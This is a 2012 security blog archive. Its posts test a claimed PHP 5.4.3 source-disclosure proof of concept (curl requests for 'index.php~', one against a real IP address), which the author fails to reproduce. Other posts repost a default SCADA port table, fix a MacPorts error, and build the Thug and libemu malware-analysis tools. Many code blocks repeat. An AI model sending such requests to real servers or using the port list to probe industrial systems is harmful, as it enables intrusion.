Posted: June 15th, 2012 | Author: xanda | Filed under: IT Related | Tags: 5.4.3, Code Read Vulnerability, php | 2 Comments »
As posted on http://1337day.com/exploits/18605, cheki claimed that PHP 5.4.3 is vulnerable to code read vulnerability, where the PHP interpreter will fail to execute the file once ‘~’ symbol added to the end of the file name. Snipped from the PoC:
=============================================================
#Demo: [root@cheki]# curl 109.234.119.2/index.php~
result: <!--?php phpinfo(); ?-->
#Target: http://localhost/index.php~
result: <!--?php phpinfo(); ?-->
============================================================
[root@cheki]# curl 109.234.119.2/index.php
result: NULL
#Target: http://localhost/index.php
result: NULL
=========================================================== |
=============================================================
#Demo: [root@cheki]# curl 109.234.119.2/index.php~
result: <!--?php phpinfo(); ?-->
#Target: http://localhost/index.php~
result: <!--?php phpinfo(); ?-->
============================================================
[root@cheki]# curl 109.234.119.2/index.php
result: NULL
#Target: http://localhost/index.php
result: NULL
===========================================================
Ok.. Since I had a test machine (Ubuntu) SSHed earlier, so I stright away add a new PPA repo (https://launchpad.net/~ondrej/+archive/php5) and install PHP 5.4.3. So here is my version to verify the PoC:
xanda@vostro:~$ php -v
PHP 5.4.3-4~precise+1 (cli) (built: May 17 2012 13:00:25)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
xanda@vostro:~$ curl 127.0.0.1/index.php
<form action="" method="post">
<input type="text" name="lala">
<input type="submit">
</form>
xanda@vostro:~$ curl 127.0.0.1/index.php~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php~ was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html> |
xanda@vostro:~$ php -v
PHP 5.4.3-4~precise+1 (cli) (built: May 17 2012 13:00:25)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
xanda@vostro:~$ curl 127.0.0.1/index.php
<form action="" method="post">
<input type="text" name="lala">
<input type="submit">
</form>
xanda@vostro:~$ curl 127.0.0.1/index.php~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php~ was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
Hurmmmm okkkk…. I haven’t tested on Fedora release 17 (Beefy Miracle) as claimed by the author, but I think this is… You name it..
Please take note that most of GUI based text editor (eg: Gedit) will (auto)save your edited file into a backup file with the same file name but ended with ‘~’… Just like in the PoC huh?
If anyone managed to test it on Fedora release 17 (Beefy Miracle), kindly drop me the result on the comment section. Thanks in advance
Cheers 🙂
Mirror for the advisory: http://pastebin.com/H1tjRDpD
Update
1) @Netasq has given 2 workarounds for this issue.
- http://twitter.com/Netasq/status/213647398025703425
In case you can't update PHP to 5.4.4, a quick Apache fix #security (1/2) Order allow,deny Deny from all |
In case you can't update PHP to 5.4.4, a quick Apache fix #security (1/2) Order allow,deny Deny from all
2) Its not listed here (or I’ve missed it?) :- http://www.php.net/ChangeLog-5.php
Posted: June 14th, 2012 | Author: xanda | Filed under: IT Related | Tags: port, SCADA | No Comments »
Just re-mirror for http://pastebin.com/EwCibKgc
# Default Scada Ports
- xflix
+-------+---------------------------------------+
| Port | Description |
+-------+---------------------------------------+
| 502 | Modbus |
| 1089 | Foundation Fieldbus HSE |
| 1090 | Foundation Fieldbus HSE |
| 1091 | Foundation Fieldbus HSE |
| 1541 | Foxboro/Invensys Foxboro DCS Informix |
| 1883 | MQ Telemetry Transport |
| 2222 | EtherNet/IP |
| 3480 | OPC UA Discovery Server |
| 4000 | Emerson/Fisher ROC Plus |
| 4592 | Project/SCADA Node Primary Port |
| 5050 | Telvent OASyS DNA |
| 5052 | Telvent OASyS DNA |
| 5065 | Telvent OASyS DNA |
| 5450 | OSIsoft PI Server |
| 10307 | ABB Ranger 2003 |
| 10311 | ABB Ranger 2003 |
| 10364 | ABB Ranger 2003 |
| 10407 | ABB Ranger 2003 |
| 10409 | ABB Ranger 2003 |
| 10412 | ABB Ranger 2003 |
| 10414 | ABB Ranger 2003 |
| 10428 | ABB Ranger 2003 |
| 10431 | ABB Ranger 2003 |
| 10447 | ABB Ranger 2003 |
| 10449 | ABB Ranger 2003 |
| 12316 | ABB Ranger 2003 |
| 12645 | ABB Ranger 2003 |
| 12647 | ABB Ranger 2003 |
| 13722 | ABB Ranger 2003 |
| 11001 | Johnson Controls Metasys N1 |
| 12135 | Telvent OASyS DNA |
| 13724 | ABB Ranger 2003 |
| 13782 | ABB Ranger 2003 |
| 14592 | SCADA Node Secondary Port |
| 18000 | Iconic Genesis32 GenBroker (TCP) |
| 19999 | DNP |
| 20000 | DNP3 |
| 34962 | PROFINET |
| 34963 | PROFINET |
| 34964 | PROFINET |
| 34980 | EtherCAT |
| 38589 | ABB Ranger 2003 |
| 38593 | ABB Ranger 2003 |
| 38000 | SNC GENe |
| 38011 | SNC GENe |
| 38014 | SNC GENe |
| 38200 | SNC GENe |
| 38210 | SNC GENe |
| 38301 | SNC GENe |
| 38400 | SNC GENe |
| 38600 | ABB Ranger 2003 |
| 38700 | SNC GENe |
| 38971 | ABB Ranger 2003 |
| 39129 | ABB Ranger 2003 |
| 39278 | ABB Ranger 2003 |
| 44818 | EtherNet/IP |
| 45678 | Foxboro/Invensys Foxboro DCS AIMAPI |
| 47808 | BACnet/IP |
| 50001 | Siemens Spectrum Power TG |
| 50018 | Siemens Spectrum Power TG |
| 50020 | Siemens Spectrum Power TG |
| 50025 | Siemens Spectrum Power TG |
| 50110 | Siemens Spectrum Power TG |
| 55000 | FL-net Reception |
| 55003 | FL-net Transmission |
| 55550 | Foxboor/Invensys Foxboro DCS FoxAPI |
| 56001 | Telvent OASyS DNA |
| 62900 | SNC GENe |
| 62911 | SNC GENe |
| 62924 | SNC GENe |
| 62930 | SNC GENe |
| 62938 | SNC GENe |
| 62956 | SNC GENe |
| 62963 | SNC GENe |
| 62981 | SNC GENe |
| 62985 | SNC GENe |
| 62992 | SNC GENe |
| 63012 | SNC GENe |
| 63027 | SNC GENe |
| 63041 | SNC GENe |
| 63075 | SNC GENe |
| 63079 | SNC GENe |
| 63082 | SNC GENe |
| 63088 | SNC GENe |
| 63094 | SNC GENe |
| 65443 | SNC GENe |
+-------+---------------------------------------+ |
# Default Scada Ports
- xflix
+-------+---------------------------------------+
| Port | Description |
+-------+---------------------------------------+
| 502 | Modbus |
| 1089 | Foundation Fieldbus HSE |
| 1090 | Foundation Fieldbus HSE |
| 1091 | Foundation Fieldbus HSE |
| 1541 | Foxboro/Invensys Foxboro DCS Informix |
| 1883 | MQ Telemetry Transport |
| 2222 | EtherNet/IP |
| 3480 | OPC UA Discovery Server |
| 4000 | Emerson/Fisher ROC Plus |
| 4592 | Project/SCADA Node Primary Port |
| 5050 | Telvent OASyS DNA |
| 5052 | Telvent OASyS DNA |
| 5065 | Telvent OASyS DNA |
| 5450 | OSIsoft PI Server |
| 10307 | ABB Ranger 2003 |
| 10311 | ABB Ranger 2003 |
| 10364 | ABB Ranger 2003 |
| 10407 | ABB Ranger 2003 |
| 10409 | ABB Ranger 2003 |
| 10412 | ABB Ranger 2003 |
| 10414 | ABB Ranger 2003 |
| 10428 | ABB Ranger 2003 |
| 10431 | ABB Ranger 2003 |
| 10447 | ABB Ranger 2003 |
| 10449 | ABB Ranger 2003 |
| 12316 | ABB Ranger 2003 |
| 12645 | ABB Ranger 2003 |
| 12647 | ABB Ranger 2003 |
| 13722 | ABB Ranger 2003 |
| 11001 | Johnson Controls Metasys N1 |
| 12135 | Telvent OASyS DNA |
| 13724 | ABB Ranger 2003 |
| 13782 | ABB Ranger 2003 |
| 14592 | SCADA Node Secondary Port |
| 18000 | Iconic Genesis32 GenBroker (TCP) |
| 19999 | DNP |
| 20000 | DNP3 |
| 34962 | PROFINET |
| 34963 | PROFINET |
| 34964 | PROFINET |
| 34980 | EtherCAT |
| 38589 | ABB Ranger 2003 |
| 38593 | ABB Ranger 2003 |
| 38000 | SNC GENe |
| 38011 | SNC GENe |
| 38014 | SNC GENe |
| 38200 | SNC GENe |
| 38210 | SNC GENe |
| 38301 | SNC GENe |
| 38400 | SNC GENe |
| 38600 | ABB Ranger 2003 |
| 38700 | SNC GENe |
| 38971 | ABB Ranger 2003 |
| 39129 | ABB Ranger 2003 |
| 39278 | ABB Ranger 2003 |
| 44818 | EtherNet/IP |
| 45678 | Foxboro/Invensys Foxboro DCS AIMAPI |
| 47808 | BACnet/IP |
| 50001 | Siemens Spectrum Power TG |
| 50018 | Siemens Spectrum Power TG |
| 50020 | Siemens Spectrum Power TG |
| 50025 | Siemens Spectrum Power TG |
| 50110 | Siemens Spectrum Power TG |
| 55000 | FL-net Reception |
| 55003 | FL-net Transmission |
| 55550 | Foxboor/Invensys Foxboro DCS FoxAPI |
| 56001 | Telvent OASyS DNA |
| 62900 | SNC GENe |
| 62911 | SNC GENe |
| 62924 | SNC GENe |
| 62930 | SNC GENe |
| 62938 | SNC GENe |
| 62956 | SNC GENe |
| 62963 | SNC GENe |
| 62981 | SNC GENe |
| 62985 | SNC GENe |
| 62992 | SNC GENe |
| 63012 | SNC GENe |
| 63027 | SNC GENe |
| 63041 | SNC GENe |
| 63075 | SNC GENe |
| 63079 | SNC GENe |
| 63082 | SNC GENe |
| 63088 | SNC GENe |
| 63094 | SNC GENe |
| 65443 | SNC GENe |
+-------+---------------------------------------+
Posted: May 30th, 2012 | Author: xanda | Filed under: IT Related | Tags: mac, macports, pcre++, pcrexx, warning | No Comments »
I’ve updated my Macports to version 2.1.1 and out of sudden, the following error/warning occur:
Warning: No port pcre++ found in the index; can't rebuild
---> Found 0 broken port(s), determining rebuild order
---> Rebuilding in order
---> Scanning binaries for linking errors: 100.0%
---> Found 1 broken file(s), matching files to ports
Warning: No port pcre++ found in the index; can't rebuild
---> Found 0 broken port(s), determining rebuild order
---> Rebuilding in order
---> Scanning binaries for linking errors: 100.0%
---> Found 1 broken file(s), matching files to ports |
Warning: No port pcre++ found in the index; can't rebuild
---> Found 0 broken port(s), determining rebuild order
---> Rebuilding in order
---> Scanning binaries for linking errors: 100.0%
---> Found 1 broken file(s), matching files to ports
Warning: No port pcre++ found in the index; can't rebuild
---> Found 0 broken port(s), determining rebuild order
---> Rebuilding in order
---> Scanning binaries for linking errors: 100.0%
---> Found 1 broken file(s), matching files to ports
This is due to the pcre++ is now replaced with pcrexx package. As for the quick solution for this:
sudo port -f deactivate pcre++
sudo port -f activate pcrexx |
sudo port -f deactivate pcre++
sudo port -f activate pcrexx
In my case, the output is as below:
---> The following versions of pcrexx are currently installed:
---> pcrexx @0.9.5_1
---> pcrexx @0.9.5_2
Error: port activate failed: Registry error: Please specify the full version as recorded in the port registry. |
---> The following versions of pcrexx are currently installed:
---> pcrexx @0.9.5_1
---> pcrexx @0.9.5_2
Error: port activate failed: Registry error: Please specify the full version as recorded in the port registry.
Now choose the latest version and activate it
sudo port -f activate pcrexx @0.9.5_2 |
sudo port -f activate pcrexx @0.9.5_2
Posted: May 21st, 2012 | Author: xanda | Filed under: IT Related | Tags: client, honeyclient, honeypot, python, shellcode, Thug, ubuntu, v8 | 2 Comments »
Thug is a Python low-interaction honeyclient aimed at mimicking the behaviour of a web browser in order to detect and emulate malicious contents. [1]
I’m impressed with the artwork of @buffer AKA Angelo in his previous project, phoneyc and started to give a detail look and hacks on the project. While only 1 hack finished on my side, Angelo already release a brand new honeyclient based on Python + V8 JS engine called Thug. What a wonderful idea + talent
Here are some useful information that might help you to build and compile Thug + V8 on Ubuntu/Debian machine:
- Install some dependencies
sudo apt-get install python-setuptools build-essential git-core subversion scons python-chardet python-html5lib libboost-python-dev libboost-dev python-pefile python-httplib2 python-cssutils libboost-thread-dev libc6-dev libreadline-dev libboost-system-dev
sudo easy_install beautifulsoup4
sudo apt-get install python-magic python-pydot |
sudo apt-get install python-setuptools build-essential git-core subversion scons python-chardet python-html5lib libboost-python-dev libboost-dev python-pefile python-httplib2 python-cssutils libboost-thread-dev libc6-dev libreadline-dev libboost-system-dev
sudo easy_install beautifulsoup4
sudo apt-get install python-magic python-pydot
- Obtain the codes via svn and git
cd ~
git clone https://github.com/buffer/thug.git
cd ~/thug/
svn checkout http://v8.googlecode.com/svn/trunk/ v8 |
cd ~
git clone https://github.com/buffer/thug.git
cd ~/thug/
svn checkout http://v8.googlecode.com/svn/trunk/ v8
- Apply the Thug’s patch for V8
cp patches/V8-patch* .
patch -p0 < V8-patch1.diff
patch -p0 < V8-patch2.diff
rm V8-patch* |
cp patches/V8-patch* .
patch -p0 < V8-patch1.diff
patch -p0 < V8-patch2.diff
rm V8-patch*
- Build and compile python wrapper for V8. This process will compile the V8 engine at the same time
cd /tmp/
svn checkout http://pyv8.googlecode.com/svn/trunk/ pyv8
export V8_HOME=$HOME/thug/v8
cd pyv8 && python setup.py build
sudo python setup.py install |
cd /tmp/
svn checkout http://pyv8.googlecode.com/svn/trunk/ pyv8
export V8_HOME=$HOME/thug/v8
cd pyv8 && python setup.py build
sudo python setup.py install
- If you came across the following warning, simply ignore it
#######################################################
# WARNING: Building V8 with SCons is deprecated and #
# will not work much longer. Please switch to using #
# the GYP-based build now. Instructions are at #
# http://code.google.com/p/v8/wiki/BuildingWithGYP. #
####################################################### |
#######################################################
# WARNING: Building V8 with SCons is deprecated and #
# will not work much longer. Please switch to using #
# the GYP-based build now. Instructions are at #
# http://code.google.com/p/v8/wiki/BuildingWithGYP. #
#######################################################
- Now test your installation
cd ~/thug/src
python thug.py |
cd ~/thug/src
python thug.py
- With the previous test, you will get something similar to this:
Synopsis:
Thug: Pure Python honeyclient implementation
Usage:
python thug.py [ options ] url
Options:
-h, --help Display this help information
-o, --output= Log to a specified file
-r, --referer= Specify a referer
-p, --proxy= Specify a proxy (see below for format and supported schemes)
-l, --local
-v, --verbose Enable verbose mode
-d, --debug Enable debug mode
-u, --useragent= Select a user agent (see below for values, default: xpie61)
Proxy Format:
scheme://[username:password@]host:port (supported schemes: http, socks4, socks5)
Available User-Agents:
xpie60 Internet Explorer 6.0 (Windows XP)
xpie61 Internet Explorer 6.1 (Windows XP)
xpie70 Internet Explorer 7.0 (Windows XP)
xpie80 Internet Explorer 8.0 (Windows XP)
w2kie60 Internet Explorer 6.0 (Windows 2000)
w2kie80 Internet Explorer 8.0 (Windows 2000) |
Synopsis:
Thug: Pure Python honeyclient implementation
Usage:
python thug.py [ options ] url
Options:
-h, --help Display this help information
-o, --output= Log to a specified file
-r, --referer= Specify a referer
-p, --proxy= Specify a proxy (see below for format and supported schemes)
-l, --local
-v, --verbose Enable verbose mode
-d, --debug Enable debug mode
-u, --useragent= Select a user agent (see below for values, default: xpie61)
Proxy Format:
scheme://[username:password@]host:port (supported schemes: http, socks4, socks5)
Available User-Agents:
xpie60 Internet Explorer 6.0 (Windows XP)
xpie61 Internet Explorer 6.1 (Windows XP)
xpie70 Internet Explorer 7.0 (Windows XP)
xpie80 Internet Explorer 8.0 (Windows XP)
w2kie60 Internet Explorer 6.0 (Windows 2000)
w2kie80 Internet Explorer 8.0 (Windows 2000)
Reference:
[1] https://github.com/buffer/thug
Posted: May 16th, 2012 | Author: xanda | Filed under: IT Related | Tags: libemu, pylibemu, shellcode, ubuntu | 5 Comments »
libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. It is designed to be used within network intrusion/prevention detections and honeypots. [1]
Here are some useful information that might help you to build and compile libemu on Ubuntu machine:
- Install some dependencies for the building process
sudo apt-get install build-essential git-core autoconf libtool python-dev |
sudo apt-get install build-essential git-core autoconf libtool python-dev
- Obtaining libemu via Git
cd /tmp/
git clone git://git.carnivore.it/libemu.git |
cd /tmp/
git clone git://git.carnivore.it/libemu.git
- Configure and install
cd /tmp/libemu/
autoreconf -v -i
./configure --enable-python-bindings --prefix=/opt/libemu
sudo make install
sudo ldconfig -n /opt/libemu/lib |
cd /tmp/libemu/
autoreconf -v -i
./configure --enable-python-bindings --prefix=/opt/libemu
sudo make install
sudo ldconfig -n /opt/libemu/lib
Now install the pylibemu, the python wrapper for the Libemu library
- Install some dependencies for the building process
sudo apt-get install python-dev python-setuptools |
sudo apt-get install python-dev python-setuptools
- Obtaining pylibemu via Git
cd /tmp/
git clone https://github.com/buffer/pylibemu.git |
cd /tmp/
git clone https://github.com/buffer/pylibemu.git
- Build and install
cd /tmp/pylibemu/
sudo sh -c "echo /opt/libemu/lib > /etc/ld.so.conf.d/pylibemu.conf"
python setup.py build
sudo python setup.py install |
cd /tmp/pylibemu/
sudo sh -c "echo /opt/libemu/lib > /etc/ld.so.conf.d/pylibemu.conf"
python setup.py build
sudo python setup.py install
Yerp.. you are good to go.
Reference:
[1] http://libemu.carnivore.it